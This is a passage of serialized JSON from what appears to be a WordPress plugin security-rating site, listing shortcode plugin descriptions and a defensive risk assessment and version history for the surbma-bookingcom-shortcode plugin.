PRO\u003C\u002Fh3>\n\u003Cp>Shortcoder also provides a \u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">PRO version\u003C\u002Fa> which has additional features to further enhance the experience. 
Below features are offered in the PRO version.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Custom editor\u003C\u002Fstrong> – Edit Shortcode content using block editor or page builder plugins like Elementor and WPBakery.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>(New) Translation with WPML\u003C\u002Fstrong> – Translate Shortcode content with WPML.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Revisions\u003C\u002Fstrong> – Revisions support for Shortcode content.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Locate shortcode\u003C\u002Fstrong> – Search posts and pages where a shortcode is used.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Extra code\u003C\u002Fstrong> – Include extra code to the footer when a shortcode is used in a page.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">Get started with Shortcoder – PRO\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Links\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fdocs\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fdocs\u002Fshortcoder\u002Ffaq\u002F\" rel=\"nofollow ugc\">FAQs\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fforum\u002F\" rel=\"nofollow ugc\">Support forum\u002FReport bugs\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F#pro\" rel=\"nofollow ugc\">PRO features\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","Create custom \"Shortcodes\" easily for HTML, JavaScript, CSS code snippets and use the shortcodes within posts, pages & 
widgets",100000,1903638,226,"2026-03-01T17:44:00.000Z","4.9.0","5.3",[132,133,134,20,135],"code","html","javascript","snippets","https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcoder.6.5.2.zip",2,"2026-01-09 00:00:00",{"slug":141,"name":142,"version":143,"author":144,"author_profile":145,"description":146,"short_description":147,"active_installs":148,"downloaded":149,"rating":150,"num_ratings":151,"last_updated":152,"tested_up_to":153,"requires_at_least":154,"requires_php":155,"tags":156,"homepage":160,"download_link":161,"security_score":162,"vuln_count":13,"unpatched_count":13,"last_vuln_date":33,"fetched_at":26},"display-posts-shortcode","Display Posts – Easy lists, grids, navigation, and more","3.0.3","Bill Erickson","https:\u002F\u002Fprofiles.wordpress.org\u002Fbillerickson\u002F","\u003Cp>Display Posts allows you easily list content from all across your website. Start by adding this shortcode in the content editor to display a list of your most recent posts:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>\u003Cstrong>Filter by Category\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>To only show posts within a certain category, use the category parameter:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts category=\"news\"]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>\u003Cstrong>Display as Post Grid\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>You can create a great looking, column-based grid of posts with a bit of styling. \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002F2019\u002F01\u002F04\u002Fpost-grid-styling\u002F\" rel=\"nofollow ugc\">Here’s how!\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>List Popular Posts\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can highlight your popular content in multiple ways. 
If you want to feature the posts with the most comments, use:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts orderby=\"comment_count\"]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>You can also list \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002F2019\u002F01\u002F04\u002Fmost-popular-posts-by-social-shares\u002F\" rel=\"nofollow ugc\">most popular posts by social shares\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Include thumbnails, excerpts, and more\u003C\u002Fstrong>\u003Cbr \u002F>\nThe \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#display-parameters\" rel=\"nofollow ugc\">display parameters\u003C\u002Fa> let you control what information is displayed for each post. To include an image and summary, use:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts include_excerpt=\"true\" image_size=\"thumbnail\"]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>You can use any image size added by WordPress (thumbnail, medium, medium_large, large) OR any custom image size added by your theme or other plugins.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Sort the list however you like\u003C\u002Fstrong>\u003Cbr \u002F>\nBy default the listing will list the newest content first, but you can order by title, menu order, relevance, content type, metadata, and more.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>List upcoming events\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can easily list upcoming events from any event calendar. Each plugin will require slightly different code.\u003C\u002Fp>\n\u003Cp>Here are \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Ftag\u002Fevents\u002F\" rel=\"nofollow ugc\">tutorials for popular event calendar plugins\u003C\u002Fa>. 
If your plugin is not listed here, submit a support request and I’ll add it!\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Tutorials\u003C\u002Fstrong>\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Ftutorials\u002F\" rel=\"nofollow ugc\">Our tutorials\u003C\u002Fa> cover common customization requests, and are updated often.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Full Documentation\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#query-parameters\" rel=\"nofollow ugc\">Query parameters\u003C\u002Fa> for customizing which posts are listed (filter by category, tag, date…)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#display-parameters\" rel=\"nofollow ugc\">Display parameters\u003C\u002Fa> determine how the posts appear (title, excerpt, image…)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002F2019\u002F01\u002F04\u002Fuse-template-parts-to-match-your-themes-styling\u002F\" rel=\"nofollow ugc\">Template parts\u003C\u002Fa> for Display Posts to perfectly match your theme’s post listings\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fthe-output-filter\u002F\" rel=\"nofollow ugc\">Output filter\u003C\u002Fa> for complete control over how the listing looks on your site\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#display-parameters\" rel=\"nofollow ugc\">Filters\u003C\u002Fa> for even more powerful customizations for developers\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Extensions\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDisplay-Posts-Pagination\" rel=\"nofollow ugc\">Display Posts – Pagination\u003C\u002Fa> – Allow results of Display Posts to be paginated\u003C\u002Fli>\n\u003Cli>\u003Ca 
href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fdisplay-posts-date-view\u002F\" rel=\"ugc\">Display Posts – Date View\u003C\u002Fa> – Lets you break your content down by month or year.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDisplay-Posts-Alpha-View\" rel=\"nofollow ugc\">Display Posts – Alpha View\u003C\u002Fa> – Display an alphabetical listing of your content, broken down by letter\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDisplay-Posts-Transient-Cache\" rel=\"nofollow ugc\">Display Posts – Transient Cache\u003C\u002Fa> – Cache the output using transients\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002Fdps-coauthor-addon\" rel=\"nofollow ugc\">Co-Authors Plus Addon\u003C\u002Fa> – multiple authors on posts\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002Fdps-columns-extension\" rel=\"nofollow ugc\">Columns Extension\u003C\u002Fa> – display posts in columns\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDPS-Exclude-Sticky\" rel=\"nofollow ugc\">DPS Exclude Sticky\u003C\u002Fa> – exclude sticky posts unless specifically requested\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fshazahm1\u002FDisplay-Posts-Shortcode-Pinch-Zoomer\" rel=\"nofollow ugc\">DPS Pinch Zoomer\u003C\u002Fa> – adds support pinch zooming post images on mobile devices and mouse wheel zooming on desktops\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fshazahm1\u002FDisplay-Posts-Shortcode-Remote\" rel=\"nofollow ugc\">Display Posts Shortcode Remote\u003C\u002Fa> – display posts from a remote WordPress site utilizing the WP REST API.\u003C\u002Fli>\n\u003C\u002Ful>\n","Add a listing of content on your website using a simple shortcode. 
Filter the results by category, author, and more.",80000,1254585,96,164,"2024-10-14T16:53:00.000Z","6.6.5","3.0","",[157,158,84,159,20],"page","pages","query","https:\u002F\u002Fdisplayposts.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdisplay-posts-shortcode.3.0.3.zip",92,{"slug":164,"name":165,"version":166,"author":167,"author_profile":168,"description":169,"short_description":170,"active_installs":171,"downloaded":172,"rating":173,"num_ratings":174,"last_updated":175,"tested_up_to":176,"requires_at_least":177,"requires_php":155,"tags":178,"homepage":183,"download_link":184,"security_score":101,"vuln_count":47,"unpatched_count":13,"last_vuln_date":185,"fetched_at":26},"wp-show-posts","WP Show Posts","1.1.6","Tom","https:\u002F\u002Fprofiles.wordpress.org\u002Fedge22\u002F","\u003Ch4>Note\u003C\u002Fh4>\n\u003Cp>This plugin is only receiving security updates at this time. Check out our \u003Ca href=\"https:\u002F\u002Fgenerateblocks.com\u002F\" rel=\"nofollow ugc\">GenerateBlocks\u003C\u002Fa> plugin for a more modern solution.\u003C\u002Fp>\n\u003Cp>\u003Ciframe loading=\"lazy\" title=\"WP Show Posts\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F175638957?dnt=1&app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write\">\u003C\u002Fiframe>\u003C\u002Fp>\n\u003Cp>WP Show Posts allows you to display posts anywhere on your website using an easy to use shortcode.\u003C\u002Fp>\n\u003Cp>You can pull posts from any post type like WooCommerce, Easy Digital Downloads etc..\u003C\u002Fp>\n\u003Cp>This plugin works with any theme.\u003C\u002Fp>\n\u003Cp>Here are the features in the free version:\u003C\u002Fp>\n\u003Ch4>Posts\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Post type\u003C\u002Fli>\n\u003Cli>Taxonomy\u003C\u002Fli>\n\u003Cli>Terms\u003C\u002Fli>\n\u003Cli>Posts per 
page\u003C\u002Fli>\n\u003Cli>Pagination\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Columns\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Columns\u003C\u002Fli>\n\u003Cli>Columns gutter\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Images\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Show images\u003C\u002Fli>\n\u003Cli>Image width\u003C\u002Fli>\n\u003Cli>Image height\u003C\u002Fli>\n\u003Cli>Image alignment\u003C\u002Fli>\n\u003Cli>Image location\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Content\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Content type (excerpt or full post)\u003C\u002Fli>\n\u003Cli>Excerpt length\u003C\u002Fli>\n\u003Cli>Include title\u003C\u002Fli>\n\u003Cli>Read more text\u003C\u002Fli>\n\u003Cli>Read more button class\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Meta\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Include author\u003C\u002Fli>\n\u003Cli>Author location\u003C\u002Fli>\n\u003Cli>Include date\u003C\u002Fli>\n\u003Cli>Date location\u003C\u002Fli>\n\u003Cli>Include terms\u003C\u002Fli>\n\u003Cli>Terms location\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>More settings\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Author ID\u003C\u002Fli>\n\u003Cli>Exclude current\u003C\u002Fli>\n\u003Cli>Post ID\u003C\u002Fli>\n\u003Cli>Exclude post ID\u003C\u002Fli>\n\u003Cli>Ignore sticky posts\u003C\u002Fli>\n\u003Cli>Offset\u003C\u002Fli>\n\u003Cli>Order\u003C\u002Fli>\n\u003Cli>Order by\u003C\u002Fli>\n\u003Cli>Status\u003C\u002Fli>\n\u003Cli>Meta key\u003C\u002Fli>\n\u003Cli>Meta value\u003C\u002Fli>\n\u003Cli>Tax operator\u003C\u002Fli>\n\u003Cli>No results message\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Our *Pro* version has these features\u003C\u002Fh4>\n\u003Cp>\u003Ciframe loading=\"lazy\" title=\"WP Show Posts Pro\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F175660953?dnt=1&app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write\">\u003C\u002Fiframe>\u003C\u002Fp>\n\u003Cp>\u003Ca 
href=\"https:\u002F\u002Fwpshowposts.com\u002F\" title=\"Check out Pro\" rel=\"nofollow ugc\">Check out Pro\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Posts\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>AJAX pagination\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Columns\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Masonry\u003C\u002Fli>\n\u003Cli>Featured post\u003C\u002Fli>\n\u003Cli>Background color\u003C\u002Fli>\n\u003Cli>Background color hover\u003C\u002Fli>\n\u003Cli>Border color\u003C\u002Fli>\n\u003Cli>Border color hover\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Images\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Image overlay color\u003C\u002Fli>\n\u003Cli>Image overlay icon\u003C\u002Fli>\n\u003Cli>Image hover effect\u003C\u002Fli>\n\u003Cli>Image lightbox\u003C\u002Fli>\n\u003Cli>Image lightbox gallery\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Content\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Read more style\u003C\u002Fli>\n\u003Cli>Read more color\u003C\u002Fli>\n\u003Cli>Content link color\u003C\u002Fli>\n\u003Cli>Content link color hover\u003C\u002Fli>\n\u003Cli>Content text color\u003C\u002Fli>\n\u003Cli>Title color\u003C\u002Fli>\n\u003Cli>Title color hover\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Meta\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Meta color\u003C\u002Fli>\n\u003Cli>Meta color hover\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Social\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Twitter\u003C\u002Fli>\n\u003Cli>Twitter color + hover\u003C\u002Fli>\n\u003Cli>Facebook\u003C\u002Fli>\n\u003Cli>Facebook color + hover\u003C\u002Fli>\n\u003Cli>Google+\u003C\u002Fli>\n\u003Cli>Google+ color + hover\u003C\u002Fli>\n\u003Cli>Pinterest\u003C\u002Fli>\n\u003Cli>Pinterest color + hover\u003C\u002Fli>\n\u003Cli>Love it\u003C\u002Fli>\n\u003Cli>Alignment\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Check out GeneratePress, our awesome WordPress theme! 
(https:\u002F\u002Fwordpress.org\u002Fthemes\u002Fgeneratepress)\u003C\u002Fp>\n","Add posts to your website from any post type using a simple shortcode.",70000,606130,94,80,"2024-04-16T19:12:00.000Z","6.1.10","4.5",[141,179,180,181,182],"gallery","portfolio","post-columns","show-posts","https:\u002F\u002Fwpshowposts.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-show-posts.1.1.6.zip","2024-04-16 00:00:00",{"attackSurface":187,"codeSignals":200,"taintFlows":207,"riskAssessment":208,"analyzedAt":218},{"hooks":188,"ajaxHandlers":193,"restRoutes":194,"shortcodes":195,"cronEvents":199,"entryPointCount":24,"unprotectedCount":13},[189],{"type":190,"name":191,"callback":192,"file":44,"line":102},"action","init","closure",[],[],[196],{"tag":197,"callback":192,"file":44,"line":198},"surbma-bookingcom",27,[],{"dangerousFunctions":201,"sqlUsage":202,"outputEscaping":204,"fileOperations":13,"externalRequests":13,"nonceChecks":13,"capabilityChecks":13,"bundledLibraries":206},[],{"prepared":13,"raw":13,"locations":203},[],{"escaped":24,"rawEcho":13,"locations":205},[],[],[],{"summary":209,"deductions":210},"The surbma-bookingcom-shortcode plugin v2.1.1 presents a mixed security posture.  On the positive side, the static analysis reveals strong adherence to secure coding practices. There are no dangerous functions used, all SQL queries utilize prepared statements, and all identified output is properly escaped. Furthermore, the absence of file operations and external HTTP requests reduces potential attack vectors.  However, a significant concern is the complete lack of nonce checks and capability checks across all entry points. 
While the current static analysis reports zero unprotected entry points, this likely reflects the small number of entry points identified (only one shortcode) and does not rule out the risk of unprotected functionality if new entry points are added or if the single shortcode's execution context can be manipulated without authentication.\n\nThe vulnerability history indicates a past medium-severity Cross-Site Scripting (XSS) vulnerability. Although there are no currently unpatched CVEs, the existence of a past XSS issue, even if resolved, suggests potential weaknesses in input sanitization or output escaping that could resurface if not carefully maintained. The fact that the last vulnerability was dated 2026-04-13 also raises a red flag, implying the data might be from a future perspective or contain an error, making it difficult to assess the current state of ongoing maintenance; this record's own analysis timestamp is 2026-04-16, so the date should be verified against the advisory before it is treated as an error. The current version appears to be patched concerning past vulnerabilities, but the lack of robust authentication and authorization checks for its single entry point remains a notable weakness. Because that entry point is a shortcode, the control to verify first is validation and escaping of the shortcode attributes at the point where they are written into the page output.",[211,214,216],{"reason":212,"points":213},"Missing nonce checks on entry points",8,{"reason":215,"points":213},"Missing capability checks on entry points",{"reason":217,"points":11},"Past medium-severity XSS vulnerability","2026-04-16T12:29:47.220Z",{"wat":220,"direct":226},{"assetPaths":221,"generatorPatterns":222,"scriptPaths":223,"versionParams":225},[],[],[224],"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html",[],{"cssClasses":227,"htmlComments":228,"htmlAttributes":229,"restEndpoints":230,"jsGlobals":231,"shortcodeOutput":232},[],[],[],[],[],[233],"\u003Cscript type=\"text\u002Fjavascript\" 
src=\"",{"slug":4,"current_version":6,"total_versions":235,"versions":236},5,[237,243,251,259,267],{"version":6,"download_url":22,"svn_tag_url":238,"released_at":33,"has_diff":46,"diff_files_changed":239,"diff_lines":33,"trac_diff_url":240,"vulnerabilities":241,"is_current":242},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F2.0&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F2.1.1",[],true,{"version":244,"download_url":245,"svn_tag_url":246,"released_at":33,"has_diff":46,"diff_files_changed":247,"diff_lines":33,"trac_diff_url":248,"vulnerabilities":249,"is_current":46},"2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.1.0&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F2.0",[250],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6},{"version":252,"download_url":253,"svn_tag_url":254,"released_at":33,"has_diff":46,"diff_files_changed":255,"diff_lines":33,"trac_diff_url":256,"vulnerabilities":257,"is_current":46},"1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.1.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F1.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.0.3&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.1.0",[258],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6},{"version":260,"download_url":261,"svn_tag_url":262,"released_at":33,"has_diff":4
6,"diff_files_changed":263,"diff_lines":33,"trac_diff_url":264,"vulnerabilities":265,"is_current":46},"1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.1.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.0.2&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.0.3",[266],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6},{"version":268,"download_url":269,"svn_tag_url":270,"released_at":33,"has_diff":46,"diff_files_changed":271,"diff_lines":33,"trac_diff_url":33,"vulnerabilities":272,"is_current":46},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F1.0.2\u002F",[],[273],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6}]